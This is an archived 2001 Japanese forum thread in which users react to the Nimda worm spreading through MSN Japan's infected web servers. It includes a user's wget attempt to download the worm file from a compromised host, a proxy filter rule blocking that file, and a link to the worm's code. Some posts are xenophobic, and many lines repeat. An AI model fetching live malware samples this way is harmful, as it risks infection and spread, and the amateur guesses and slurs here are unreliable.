172 : :01/09/19 18:21 ID:186vJgXg
173 :ぺ ◆lPYiMAEY :01/09/19 18:21 ID:1xVp6UNk
>158
ヘルプも読んでね。
ヘルプも読んでね。
174 : :01/09/19 18:22 ID:GcqnTF1U
175 :緊急通告:01/09/19 18:23 ID:GcqnTF1U
176 :nanashi:01/09/19 18:23 ID:HFixfMC6
しかしMSNは何様なんだ。
謝罪ページはまるでやる気なし。
ふぁっく!!まいくろそふと
謝罪ページはまるでやる気なし。
ふぁっく!!まいくろそふと
177 : :01/09/19 18:26 ID:GcqnTF1U
178 : :01/09/19 18:28 ID:Yqm8oZbI
ウィルス入りXPイイ!!(・∀・)
179 :167:01/09/19 18:29 ID:7PIOAoLY
検疫場所にあるんだけど、これは削除した方がいいの?
180 :158:01/09/19 18:33 ID:IbujS4AA
ノートン更新できました。教えてくれた人ありがとうございます。
うざいとは思いましたが検索してどっかを見るのも怖かったんで
勘弁してください。
うざいとは思いましたが検索してどっかを見るのも怖かったんで
勘弁してください。
181 : :01/09/19 18:34 ID:rJO4rUQE
正直、ノートンの更新も怖い
182 : :01/09/19 18:35 ID:/Btmv0Ik
ノートン先生大忙し。
かちゅに変えれば2ch内は安全か?
184 :150:01/09/19 18:38 ID:kYae1k7A
Unix.Penguin
Harakiri
どうやらUnix.Penguinでパスワードを盗まれたみたいだけれども
システム パスワード データ ファイルって、
起動するときに必要なパスワードのことですか?
起動パスワードを変えるべきですか?
それと、Harakiri って、何をしでかすウィルスですか?
めったにウィルス感染しない私が
一度に二つも病気をもらうなんて・・・。
Harakiri
どうやらUnix.Penguinでパスワードを盗まれたみたいだけれども
システム パスワード データ ファイルって、
起動するときに必要なパスワードのことですか?
起動パスワードを変えるべきですか?
それと、Harakiri って、何をしでかすウィルスですか?
めったにウィルス感染しない私が
一度に二つも病気をもらうなんて・・・。
185 :_:01/09/19 18:39 ID:BHKeU2R.
オレ全然平気なんだけど。エロサイトもどこもみーんな正常。
とりあえずsp2にして安置ウイルス更新しまくったけど。
とりあえずsp2にして安置ウイルス更新しまくったけど。
186 : :01/09/19 18:40 ID:qWuPgyw6
腹切り、、、こわっ
NAV、今日午後のアップデートするまでAutoProtect効いてなかったような
気がするんだけど...
気がするんだけど...
188 : :01/09/19 18:43 ID:ymeZ6.OA
TORATORATORAってのもあったな。
189 :1:01/09/19 18:43 ID:BvaOJetc
■注意■
ウィルスバスター2001を入れてる人は、
定義ファイルをアップデートするときに
IEのインターネットオプションでProxyを切って、
IEやその他タブブラウザ等を終了させてから、
ウィルスバスターのProxy設定をオフにしてアップデートを実行しないと
ちゃんと接続しないみたい。
ウィルスバスター2001を入れてる人は、
定義ファイルをアップデートするときに
IEのインターネットオプションでProxyを切って、
IEやその他タブブラウザ等を終了させてから、
ウィルスバスターのProxy設定をオフにしてアップデートを実行しないと
ちゃんと接続しないみたい。
190 : :01/09/19 18:44 ID:qq6rhHg6
MSNからの謝罪はないのか?
191 :ななし:01/09/19 18:44 ID:N0xFY1Qw
MSNはIISのパッチを当ててなかったってことだろ?
ほんとにナにやってんだ。
ほんとにナにやってんだ。
192 :1:01/09/19 18:44 ID:BvaOJetc
193 :ななし:01/09/19 18:47 ID:CcUhePas
MSN日本、きっとゲイツにめちゃくちゃ怒られるんだろうな、合掌。
194 : :01/09/19 18:50 ID:qq6rhHg6
会社のサーバーめちゃくちゃじゃんか!謝罪しろ!MSN!
195 :名無し:01/09/19 18:52 ID:GEWbAhZY
196 : :01/09/19 18:53 ID:Zo6NgQsw
108じゃないんだけど…
>>126
% wget http://www.igosoft.co.jp/html/update/readme.eml
--18:50:13-- http://www.igosoft.co.jp:80/html/update/readme.eml
=> `readme.eml'
Connecting to www.igosoft.co.jp:80... connected!
HTTP request sent, awaiting response... 404 Object Not Found
18:50:14 ERROR 404: Object Not Found.
消されちゃったみたいだ
他にもどっかにない?
>>126
% wget http://www.igosoft.co.jp/html/update/readme.eml
--18:50:13-- http://www.igosoft.co.jp:80/html/update/readme.eml
=> `readme.eml'
Connecting to www.igosoft.co.jp:80... connected!
HTTP request sent, awaiting response... 404 Object Not Found
18:50:14 ERROR 404: Object Not Found.
消されちゃったみたいだ
他にもどっかにない?
197 :ななしさん:01/09/19 18:53 ID:K0x/0bfc
SP2当てたIEだと自動実行される可能性はない?
あと、DLしますかってのをDLするだけでは感染しないよね?
あと、DLしますかってのをDLするだけでは感染しないよね?
198 : :01/09/19 18:54 ID:.0phwmCw
今までさんざんヴァカにしてたマカーがうらやましい。
199 :名無しさん:01/09/19 18:54 ID:JKqPzNbc
そりゃあEXEなんだから、実行しなければ何も起きないだろうね。
200 : :01/09/19 18:55 ID:nw6SkW7Q
マカーですけど、なんか仲間はずれみたいでさみしーです。
201 : :01/09/19 18:55 ID:wkpIYpz2
5.感染したPCはCドライブをネットワーク共有する。
これが一番恐ろしい。
これが一番恐ろしい。
で、今回の損害はいくらぐらいで?
ProxomitronのNimda-Killerって既出かな?
[HTTP headers]
In = FALSE
Out = TRUE
Key = "Nimda-Killer: Kill Nimda worm infection (Out)"
URL = "*readme.eml"
Replace = "\k"
[HTTP headers]
In = FALSE
Out = TRUE
Key = "Nimda-Killer: Kill Nimda worm infection (Out)"
URL = "*readme.eml"
Replace = "\k"
204 : :01/09/19 18:57 ID:GcqnTF1U
世界的にはマカフィーなんだよ
特に企業ユーザーは圧倒的
特に企業ユーザーは圧倒的
205 :ななし:01/09/19 18:59 ID:N0xFY1Qw
2chのサーバーIISで感染してたらえらいことになってたね。
206 :素朴な疑問:01/09/19 19:00 ID:CcUhePas
糞システムを作ったMSが悪いのか、パッチをあてずに使ってたサーバーが悪いのか?
訴えるとすれば、どっちだ?
訴えるとすれば、どっちだ?
207 : :01/09/19 19:00 ID:kYae1k7A
システムフォルダの感染ではなく
MYDOCUMENTの収納されている遠く離れた
Jドライブに感染していたのだけれども
これって、MYDOCUMENTに収納されている
かちゅ〜しゃかMDIBrowser経由で感染したのかしら?
Unix.Penguin
Harakiri
どうやらUnix.Penguinでパスワードを盗まれたみたいだけれども
システム パスワード データ ファイルって、
起動するときに必要なパスワードのことですか?
起動パスワードを変えるべきですか?
それと、Harakiri って、何をしでかすウィルスですか?
めったにウィルス感染しない私が
MYDOCUMENTの収納されている遠く離れた
Jドライブに感染していたのだけれども
これって、MYDOCUMENTに収納されている
かちゅ〜しゃかMDIBrowser経由で感染したのかしら?
Unix.Penguin
Harakiri
どうやらUnix.Penguinでパスワードを盗まれたみたいだけれども
システム パスワード データ ファイルって、
起動するときに必要なパスワードのことですか?
起動パスワードを変えるべきですか?
それと、Harakiri って、何をしでかすウィルスですか?
めったにウィルス感染しない私が
208 : :01/09/19 19:01 ID:N4bOjUDo
なんか、HDD内のreadme.exeファイル検索かましたら、
ニュー速のlog4つぐらいひっかかったんだけども、これってもしかして
ニュー速のlog4つぐらいひっかかったんだけども、これってもしかして
209 :名無しさん:01/09/19 19:01 ID:xd.89Pkw
犯罪者にも相手にされない腐れマカー
210 :1:01/09/19 19:01 ID:BvaOJetc
211 : :01/09/19 19:02 ID:300xAdx2
さっそく感染したんだけど駆除の仕方教えて
212 :>205:01/09/19 19:02 ID:GH8iZZE6
2chは、LinuxだからApacheじゃねーの?
213 :1:01/09/19 19:03 ID:BvaOJetc
214 :名無し募集中。。。:01/09/19 19:03 ID:rl7votQQ
ウイルスバスター2001のパターンファイル番号は、現在「942」です。
215 : :01/09/19 19:03 ID:iBpwHYOQ
それ以前にこんなカスシステムを作ったM$は、仕様と言い逃れせずに謝罪しる
216 :208:01/09/19 19:04 ID:N4bOjUDo
あ、間違えてた文字列検索かましてた(W
217 :名無し募集中。。。:01/09/19 19:14 ID:rl7votQQ
ウイルスバスター2001のパターンファイル番号は、現在「942」です。
ノートンアンチウイルス2001のパターンファイルは、9月18日版で定義数54005個です。
218 : :01/09/19 19:21 ID:eV4P7Bbo
http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。
A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。
A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。
219 : :01/09/19 19:23 ID:1rIQgoro
# 今帰ってきた。IDが違うけど、それは自宅と勤務先の違いだ(w
>>193
おそらく担当者の首は飛ぶモノと思われ。
あの人は怒ると怖いんで。普通の会社と違って下手に技術に詳しいからごまかせないし。
>>210
昔はそうだったが、今は知らない(^^;
>>212
apacheはWebサーバソフトウエアの名前。SlackwareはLinuxのディストリビューションの名前だ。
それぞれhttp://www.linux.or.jp/あたりで調べてみると良い。
>>193
おそらく担当者の首は飛ぶモノと思われ。
あの人は怒ると怖いんで。普通の会社と違って下手に技術に詳しいからごまかせないし。
>>210
昔はそうだったが、今は知らない(^^;
>>212
apacheはWebサーバソフトウエアの名前。SlackwareはLinuxのディストリビューションの名前だ。
それぞれhttp://www.linux.or.jp/あたりで調べてみると良い。
221 :名無し:01/09/19 19:24 ID:GEWbAhZY
らくらくメールBOXにかえたYo!
223 :1:01/09/19 19:31 ID:BvaOJetc
224 : :01/09/19 19:35 ID:RncXfoU2
感染したサイトにアクセスすると、出てくるダイアログで
いいえを選んでも、メディアプレーヤーが立ち上がって
再生しようとするのだが、これ再生すると感染するのかな?
とりあえず、再生前にすぐ終了させてるけど・・・
いいえを選んでも、メディアプレーヤーが立ち上がって
再生しようとするのだが、これ再生すると感染するのかな?
とりあえず、再生前にすぐ終了させてるけど・・・
225 :1:01/09/19 19:37 ID:BvaOJetc
さーて。ハモネプ見ようっと。。
226 : :01/09/19 19:39 ID:vHNMmWF6
>220
そんなこと、わかってるけど、、。
なんか、俺、間違ったこと言った?
そんなこと、わかってるけど、、。
なんか、俺、間違ったこと言った?
228 : :01/09/19 19:43 ID:mZcCViNs
229 :鯖監視中:01/09/19 19:45 ID:jBy9Jubo
感染者があまりにも多いので驚いています。
ずっと見ているわけじゃないので、見落としがあるかもしれないけど、
今朝からいままでうちの鯖にアクセスしてる人で感染してない人は
なんとゼロ!
こんなことがあっていいのか?
社内のPC以外のアクセスすべて感染者です。コワイです。
感染した人は早く駆除して下さい。よろしくです。
ずっと見ているわけじゃないので、見落としがあるかもしれないけど、
今朝からいままでうちの鯖にアクセスしてる人で感染してない人は
なんとゼロ!
こんなことがあっていいのか?
社内のPC以外のアクセスすべて感染者です。コワイです。
感染した人は早く駆除して下さい。よろしくです。
230 : :01/09/19 19:49 ID:0vW2CaDA
会社でウィルス騒ぎだったが…これか?
なんか台風についてのページを見てたら出たとかなんとか。
なんか台風についてのページを見てたら出たとかなんとか。
232 :229:01/09/19 19:54 ID:jBy9Jubo
複数の会社の鯖を運用していますが、どれも普通の会社のサイトです。
ちなみにアダルトとかは一切ありませんです。
これを見てると幅広い層に均等に感染している感触です。
ちなみにアダルトとかは一切ありませんです。
これを見てると幅広い層に均等に感染している感触です。
233 :ちょ:01/09/19 19:54 ID:1vjJkxgU
*emlで検索したら1こ出てきた。
でも、
>OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
>emlが出たからと言って必ずしも感染しているとは限らない。
ってことだから平気かな・・不安。
でも、
>OutlookExpress系のメーラーでは送受信メールの拡張子が*.emlなので、
>emlが出たからと言って必ずしも感染しているとは限らない。
ってことだから平気かな・・不安。
234 : :01/09/19 19:55 ID:mxUXkeNs
236 : :01/09/19 19:56 ID:m9yCiymc
237 :超厨房:01/09/19 19:56 ID:xQeiwLFw
2ちゃん見るだけなら問題ないの?
238 : :01/09/19 19:58 ID:vHNMmWF6
IE6導入したら「Д」が太字で表示されるようになったんだけど…
これは直せないんでしょうか?
これは直せないんでしょうか?
241 : :01/09/19 20:18 ID:mxUXkeNs
感染サイト減ってきたのかな?????
243 :しろうと:01/09/19 20:25 ID:1Wx561lk
なんだか、すごい被害数になりそう。
244 :名無しプログラマさん:01/09/19 20:31 ID:p7DbW286
今日、うちの会社でもその情報をうけて、
最新版のパッチを当てた途端に引っかかった。
こりゃ他人事じゃないと実感したね。
最新版のパッチを当てた途端に引っかかった。
こりゃ他人事じゃないと実感したね。
245 :■最悪のウイルス登場MSNが配布 その3■ :01/09/19 20:33 ID:exctKRVA
ウイルスに感染しているサイト
www.leica.co.jp
上ページにハッカーからのメッセージと思われる文章あり
www.leica.co.jp
上ページにハッカーからのメッセージと思われる文章あり
247 :超初心者:01/09/19 20:35 ID:DzVq5s1s
apacheログはどこで見ればいいんすか?
>>247
httpd.confにログファイルをどこに置くのか書いているので、それを参照してください。
ErrorLogで始まる行にエラーログが、CustomLogで始まる行にアクセスログのそれぞれファイル名があるはず。
httpd.confにログファイルをどこに置くのか書いているので、それを参照してください。
ErrorLogで始まる行にエラーログが、CustomLogで始まる行にアクセスログのそれぞれファイル名があるはず。
<愚痴>
# なんか初心者向けスレと同時に回答してるとさすがに辛いやね。
# 自分のトコの掲示板の帯域が余っていたらソコに書いておいても
# いいんだけど、そこまで帯域は無いところなんで(汗
</愚痴>
# なんか初心者向けスレと同時に回答してるとさすがに辛いやね。
# 自分のトコの掲示板の帯域が余っていたらソコに書いておいても
# いいんだけど、そこまで帯域は無いところなんで(汗
</愚痴>
250 :予想:01/09/19 20:48 ID:gFa/ijCk
ってゆーかtrendmicro社のパターンファイル更新ようのWEBサーバ、
inet.trendmicro.co.jpって今日一日繋がんないけど
これってIIS使ってるし、このウィルスに感染したんじゃない?
今、その対応のためにダウンしてんじゃない?
これホントだったら大スクープよ。
inet.trendmicro.co.jpって今日一日繋がんないけど
これってIIS使ってるし、このウィルスに感染したんじゃない?
今、その対応のためにダウンしてんじゃない?
これホントだったら大スクープよ。
251 :245:01/09/19 20:49 ID:exctKRVA
ウイルスアクセス元のサーバをあたってたら見つけた
上ページ
上ページ
252 :250:01/09/19 20:52 ID:gFa/ijCk
253 : :01/09/19 20:53 ID:FC6NTLqw
IE5.5に変更してからすこぶる調子わるいよ〜〜!!!!
254 :いや〜ん:01/09/19 20:53 ID:e.oAcSsc
いや〜ん!課長のPC感染しちゃったみた〜い。
サイバーテロか?とか課長さん一人で騒いでる〜!!
サイバーテロか?とか課長さん一人で騒いでる〜!!
255 : :01/09/19 20:55 ID:qq6rhHg6
はぁーWin2kserver再インスト・・・鬱だ・・・。
257 :251:01/09/19 20:56 ID:exctKRVA
tokyo3.leica.co.jp
上IPより複数回のウイルス攻撃があった
上IPより複数回のウイルス攻撃があった
258 :結構前から見てるけど:01/09/19 20:57 ID:.R9N8RVQ
あぼーん
260 : :01/09/19 20:59 ID:qq6rhHg6
早くワクチン開発してくれー。。。
2kserver用も忘れずに。。。
2kserver用も忘れずに。。。
261 : :01/09/19 20:59 ID:uuoG2bM2
PCを立ち上げて20分で20回もZAが作動してる。今朝よりも確実に増えてる。(;´Д`)
あぼーん
263 : :01/09/19 21:00 ID:8I2VsByk
笑えることに会社のPCはみんなMSNが最初に立ち上がるようになってる。
264 : :01/09/19 21:01 ID:qq6rhHg6
265 : :01/09/19 21:02 ID:qq6rhHg6
社長のマシンのバックグラウンドで動いてた・・・。
266 : :01/09/19 21:10 ID:.xMfJQ6o
【これまでの流れ】
9/18深夜にウィルスをばら撒く
↓
MSNのHPより大量感染
↓
初心者が、あわてふためき
↓
設定カシャカシャ
↓
日本語版IE6.0発表
↓
ついでにWindowsXPの価格発表
↓
マイクロソフト宣伝効果絶大
↓
(;´Д`) ウマ-
267 : :01/09/19 21:10 ID:C52gLmh6
268 : :01/09/19 21:11 ID:qq6rhHg6
269 : :01/09/19 21:15 ID:uuoG2bM2
XPホームエディションへのアップグレード版1万3800円。
XPプロフェッショナルへのアップグレード版2万3800円。
儲かりますな。マイクロソフトは。。。。
XPプロフェッショナルへのアップグレード版2万3800円。
儲かりますな。マイクロソフトは。。。。
270 :ナナシサソ:01/09/19 21:20 ID:uy8Pfu/w
今回のワーム「Nimda」の埋め込むコードとか本体とか
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000326.htm
>それでもまぁ一応中身を見てみたい人がいると思うので、テキストファイルにしてみました。
>
> 78KB
> http://hp.vector.co.jp/authors/VA024894/MVQKJ05D.txt
>
> 見るだけでは感染しませんのでご安心を。
誰か人柱キボン
http://keisui.com/GIGAZINE/cgi-bin/news/html/lg/000326.htm
>それでもまぁ一応中身を見てみたい人がいると思うので、テキストファイルにしてみました。
>
> 78KB
> http://hp.vector.co.jp/authors/VA024894/MVQKJ05D.txt
>
> 見るだけでは感染しませんのでご安心を。
誰か人柱キボン
MSNの件は[email protected]にでも(英語でね)言いつけてやれ・・
http://www.microsoft.com/billgates/COLUMNs/1998Q&A/QA8-26.asp
1998年現在での話なんで今どうなってるかは知らないが。
http://www.microsoft.com/billgates/COLUMNs/1998Q&A/QA8-26.asp
1998年現在での話なんで今どうなってるかは知らないが。
272 :254:01/09/19 21:23 ID:fXyNoOTY
糞!えらい迷惑だにょ。報告書を書かねば。
273 :..:01/09/19 21:28 ID:WHtEQBvI
>270
大丈夫だよ
readme.emlならなんどもテキストエディタで見たよ
ダブルクリックは怖くてできないけど・・・・
大丈夫だよ
readme.emlならなんどもテキストエディタで見たよ
ダブルクリックは怖くてできないけど・・・・
274 : :01/09/19 21:28 ID:ALUfLgrg
NHK観れ。
275 : :01/09/19 21:28 ID:h/QFpMMM
NHK
276 : :01/09/19 21:29 ID:xrrEreS.
NHKでやってる。
言ってる言ってる
278 : :01/09/19 21:29 ID:3d3BaB5k
国内被害40件ってほんとかよ。
もっとあるだろ。
もっとあるだろ。
279 : :01/09/19 21:29 ID:uuoG2bM2
たったの40件しか被害届してないのか?ヽ(´ー`)ノ
280 :えっち帆場:01/09/19 21:30 ID:FB3NpcrY
今回、不用意に社内で共有化していた会社のサーバーは悉く感染してしまいました。
共有フォルダーごとに作成される、意味不明なemlファイルが大量に検索された時、
「これは、篠原HOS・・・」と思わず考えてしまいました。
共有フォルダーごとに作成される、意味不明なemlファイルが大量に検索された時、
「これは、篠原HOS・・・」と思わず考えてしまいました。
281 : :01/09/19 21:30 ID:cd9RQlRQ
飯島愛もどきがイパーイ
282 :名無しさん:01/09/19 21:30 ID:2FkhTqmE
NHKで40件の被害とか言ってるんですが……。
たった40件なのか。たいしたことないなあ。
たった40件なのか。たいしたことないなあ。
283 : :01/09/19 21:30 ID:ALUfLgrg
一般人はまだ気付いてないやついんじゃねの?
284 :ニダ:01/09/19 21:30 ID:YBsx.8mE
ニムダ?? 韓国が作ったのか?^^;
285 :_:01/09/19 21:31 ID:itG8WUNM
もっとカコイイ名前つけてやろう。
例 ビンラビンラ
例 ビンラビンラ
あぼーん
>>279
日本だとウイルスに感染したこと自体が「恥」として受け止められてしまうので、
感染しても被害届を出さないことがある。大企業とかはそうも行かないだろうけど、
それ以外は大抵は社長が嫌がる。
>>280
ちゃんと駆除しましょう。ご苦労様です。
>>283
気づいていないで感染したIISサーバを立ち上げている奴は多いと思う。
日本だとウイルスに感染したこと自体が「恥」として受け止められてしまうので、
感染しても被害届を出さないことがある。大企業とかはそうも行かないだろうけど、
それ以外は大抵は社長が嫌がる。
>>280
ちゃんと駆除しましょう。ご苦労様です。
>>283
気づいていないで感染したIISサーバを立ち上げている奴は多いと思う。
288 : :01/09/19 21:32 ID:uxGmYWq2
289 : :01/09/19 21:33 ID:NRln1zEY
Nimda⇔Admin
290 : :01/09/19 21:33 ID:h/QFpMMM
ニダ
291 : :01/09/19 21:34 ID:JKOzZn5M
NHKなんか信用してちゃだめだよ。
プロジェクトXなんか、ガチンコ以上のやらせだし、
裏付け取れなくてもニュースを平気で報道するよ。
騙されるなよ。
プロジェクトXなんか、ガチンコ以上のやらせだし、
裏付け取れなくてもニュースを平気で報道するよ。
騙されるなよ。
292 : :01/09/19 21:35 ID:NYetIg1I
だいたい日本人のセキュリティー認識って甘すぎる。
関係ないけど
ここ観てるヤツでFIREWALL入れてるヤツが、どれだけいる?
ワクチンのアップを三日に一回やってるヤツが、どれだけいる?
関係ないけど
ここ観てるヤツでFIREWALL入れてるヤツが、どれだけいる?
ワクチンのアップを三日に一回やってるヤツが、どれだけいる?
293 : :01/09/19 21:36 ID:186vJgXg
294 : :01/09/19 21:37 ID:ALUfLgrg
>292
してますが何か?
してますが何か?
>>291
激しく同意。つーか仕事で某研究所から出向してる人がいるので(以下略)
>>292
パターン(定義)ファイルのアップデートは1日1回。
サーバの場合は1日2回(深夜と昼間)・・多すぎる?(^^;
激しく同意。つーか仕事で某研究所から出向してる人がいるので(以下略)
>>292
パターン(定義)ファイルのアップデートは1日1回。
サーバの場合は1日2回(深夜と昼間)・・多すぎる?(^^;
296 : :01/09/19 21:38 ID:3d3BaB5k
297 : :01/09/19 21:39 ID:uuoG2bM2
298 :.:01/09/19 21:40 ID:WHtEQBvI
>292
勿論してませんが
何か?
えっ?今何やってるかって?
NT4.0の再インストールさ!
勿論してませんが
何か?
えっ?今何やってるかって?
NT4.0の再インストールさ!
299 : :01/09/19 21:40 ID:6NApNFWk
ふぅ、今日一日中大変だった。朝Apacheのログ確かめたら凄いことになってた。
で、ウチにあるPCのアップデートを全部やったのだが、Microsoftのサイトに
なかなか繋がらないし、あと1MってとこでDL切れちゃうし、ブラウザのバージョン
って何?ってな人も多かったし。でもなんとか一時的な対策は全部終わった。
中国人逝ってよし!
で、ウチにあるPCのアップデートを全部やったのだが、Microsoftのサイトに
なかなか繋がらないし、あと1MってとこでDL切れちゃうし、ブラウザのバージョン
って何?ってな人も多かったし。でもなんとか一時的な対策は全部終わった。
中国人逝ってよし!
300 : :01/09/19 21:40 ID:ehK3v1x6
301 : :01/09/19 21:41 ID:vViSS5SQ
これもラディンの仕業なのか?
302 : :01/09/19 21:41 ID:tjvI2sr6
303 :あ:01/09/19 21:41 ID:umpeMHGk
エシュロン撹乱作戦か
304 : :01/09/19 21:42 ID:uuoG2bM2
フルチンで歩くの好きな人もいると思うが・・・・(違
305 :ほう:01/09/19 21:44 ID:4Llgi.IM
ラディン恐るべし
306 :えっち帆場:01/09/19 21:44 ID:FB3NpcrY
>>292
実はFIREWALLを信頼しすぎてました、HOMEPAGEを閲覧しただけで感染するなんて
思ってもみなかったもので。
シマンテックのLIVEUPDATEも昨日更新されたばかりで、まさに隙をつかれたって感じです。
実はFIREWALLを信頼しすぎてました、HOMEPAGEを閲覧しただけで感染するなんて
思ってもみなかったもので。
シマンテックのLIVEUPDATEも昨日更新されたばかりで、まさに隙をつかれたって感じです。
307 : :01/09/19 21:45 ID:c.mmZYBk
おいおいウイルスウインドウ出たぞ。
5.5SP2なのに。
閉じたけど検索したら一個入ってた。削除したけどこれでいいの??
5.5SP2なのに。
閉じたけど検索したら一個入ってた。削除したけどこれでいいの??
nanasisan、お疲れさま。
ニュース速報板は、みんな親切で、感動です。
今日はいろいろ教えてもらって助かりました。
ニュース速報板は、みんな親切で、感動です。
今日はいろいろ教えてもらって助かりました。
>>307
IEのバージョンを上げても「ダウンロードしますか?」のメッセージは防げません。
IEのバージョンを上げないと、「ダウンロードしますか?」が出てこないうちに
裏で勝手に実行されてしまい、感染します。
IEのバージョンを上げても「ダウンロードしますか?」のメッセージは防げません。
IEのバージョンを上げないと、「ダウンロードしますか?」が出てこないうちに
裏で勝手に実行されてしまい、感染します。
310 : :01/09/19 21:47 ID:R2W3TOO6
つーか今後はウイルスソフト常駐させてHP閲覧しないといけないの?
嫌だなー
嫌だなー
311 : :01/09/19 21:48 ID:NmervPqo
313 : :01/09/19 21:49 ID:p92PERQs
IE5.00でファイルのDLを無効にしたんだけど
それでもダメなの?
なんかYAHOO!がやられてるってのを聞いたんだけど・・
それでもダメなの?
なんかYAHOO!がやられてるってのを聞いたんだけど・・
314 : :01/09/19 21:51 ID:OO3wQbOI
このワームのグランド・ゼロはどこだ??
315 :ななし:01/09/19 21:51 ID:mhpTSQ7.
旦那の会社は、これで大混乱してます。
今日中には帰ってこないかも・・・
被害届が40件??そりゃほんの1部でしょ
今日中には帰ってこないかも・・・
被害届が40件??そりゃほんの1部でしょ
>>313
念のためスクリプトも無効にしましょう。
yahooについてはとりあえずトップページは感染していない模様。
あと、yahooにはIISサーバは無かったはずなので、感染することは無いような気がしますけど。
念のためスクリプトも無効にしましょう。
yahooについてはとりあえずトップページは感染していない模様。
あと、yahooにはIISサーバは無かったはずなので、感染することは無いような気がしますけど。
317 : :01/09/19 21:53 ID:dw2qn0j.
アメリカもそうだけど、多くの人間がいるとサクッと傷めつけることができるな。
多数は時に弱点となる。しみじーみ。
多数は時に弱点となる。しみじーみ。
318 :まっくん:01/09/19 21:53 ID:060ze7pA
急にダウンロードがはじまって、
おお、マックもだめなのかといっしゅんびびったが
システムの自動アップデートだった
ひやひや
おお、マックもだめなのかといっしゅんびびったが
システムの自動アップデートだった
ひやひや
319 : :01/09/19 21:54 ID:exuvAMjI
つーか、セキュリティーソフトは入れてるだけで安心して
更新も出来ないやつはPC&ネット使うな。
更新も出来ないやつはPC&ネット使うな。
321 :313:01/09/19 21:54 ID:p92PERQs
322 : :01/09/19 21:57 ID:cynEhMlM
nimdaってadmin(アドミン)を逆につづったんだよなぁ。既出だろうけど。
323 : :01/09/19 21:57 ID:ypELY07E
324 : :01/09/19 21:57 ID:NmervPqo
私の身の回りは何も被害は無かった。ここやNHKを見てビクーリしたヨ!
そんなに被害が大きくて深刻だったの??
そんなに被害が大きくて深刻だったの??
325 : :01/09/19 21:59 ID:Et9sw1mM
ノートン2001買ってきてスキャンしたら
52個感染してた。
でも修復できないとさ(;´ー`)
52個感染してた。
でも修復できないとさ(;´ー`)
326 :.:01/09/19 22:00 ID:Sb5PIvJU
IE4.0なんだけど,被害受ける可能性あるの?
327 : :01/09/19 22:00 ID:exuvAMjI
328 : :01/09/19 22:01 ID:0JDuiGy.
既出かもしれないが、Symantec日本語情報更新
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
330 : :01/09/19 22:02 ID:vViSS5SQ
331 : :01/09/19 22:03 ID:Et9sw1mM
2000の無償アップデートが終了して以降
まったくアップデートしてなかった
ツケがここにきて…。
MSNに謝罪と補償を要求しる、しる、しる!!
まったくアップデートしてなかった
ツケがここにきて…。
MSNに謝罪と補償を要求しる、しる、しる!!
332 :シコ踏み:01/09/19 22:05 ID:qasMGDqo
>>325
わ〜。私も数ヶ月前、初めてウィルスバスターで調べたら、14個
みつかって、友達に軽蔑された…。IPだだもれ、PC起動するたび
に、¥¥yakiniku とかいうサーバーにつないでいて、個人情報
ばらまいてたらしいっす…。鬱。
わ〜。私も数ヶ月前、初めてウィルスバスターで調べたら、14個
みつかって、友達に軽蔑された…。IPだだもれ、PC起動するたび
に、¥¥yakiniku とかいうサーバーにつないでいて、個人情報
ばらまいてたらしいっす…。鬱。
333 : :01/09/19 22:05 ID:0QpBDG8A
みんななんで普段JAVAをOFFにしてないのかちょっと疑問。
そろそろXPあたりからウイルススキャンを標準添付させてもいいと思うんだけどなぁ・・
そうするとウイルススキャンのメーカーが潰れてしまうってのがあるけども。
そうするとウイルススキャンのメーカーが潰れてしまうってのがあるけども。
335 : :01/09/19 22:09 ID:d/7aZE/g
で、とにかく検索して出てこなければいいの??
337 : :01/09/19 22:11 ID:otI9IrQ.
MSNってさJAVAスクリプトオフだと見れないんじゃなかった?
339 :もna−:01/09/19 22:13 ID:ST/mPeBs
>334
マイクロソフトが最大のウイルスです。
それをやられると何をされても気がつきません。
マイクロソフトが最大のウイルスです。
それをやられると何をされても気がつきません。
340 : :01/09/19 22:13 ID:6NApNFWk
341 : :01/09/19 22:15 ID:v6961ePM
java切っていたいけど、
すると買い物できないところが結構ある。
すると買い物できないところが結構ある。
>>339
ってことはマトモにウイルスチェックのソフトウエアを作ったとすると、
> kernel32.dll (Microsoft Windowsウイルスを検出しました)
になるのかな?(^^;
>>340
今試してみたけどホントでした(^^;
申し訳ないです。
ってことはマトモにウイルスチェックのソフトウエアを作ったとすると、
> kernel32.dll (Microsoft Windowsウイルスを検出しました)
になるのかな?(^^;
>>340
今試してみたけどホントでした(^^;
申し訳ないです。
343 :おお:01/09/19 22:20 ID:k3oIsIQw
344 : :01/09/19 22:25 ID:mHejilDo
さくずけ(ボソ
345 :アンギラス:01/09/19 22:28 ID:/vlg4P6g
どいつもこいつもマッチポンプやりやがって。
あばれてやる〜
あばれてやる〜
346 :名無しの介:01/09/19 22:28 ID:TvdYEyVY
347 : :01/09/19 22:29 ID:kXOWfYUg
>>343
【MSNにウィルス添付?】の>>4>>18その他です。
バージョンは6.00.2462.0000だったので助かってますが、
バージョン5だったらアウトでした。
昨日の段階では情報無しでいろいろ試してましたので・・・
危ない、危ない。
【MSNにウィルス添付?】の>>4>>18その他です。
バージョンは6.00.2462.0000だったので助かってますが、
バージョン5だったらアウトでした。
昨日の段階では情報無しでいろいろ試してましたので・・・
危ない、危ない。
349 :}{:01/09/19 22:30 ID:NgFS5RNY
350 :予想:01/09/19 22:30 ID:AfI4q1pA
「今度のXPはセキュリティ対策も万全です」ってゲイツは売り込むんだろうな・・・
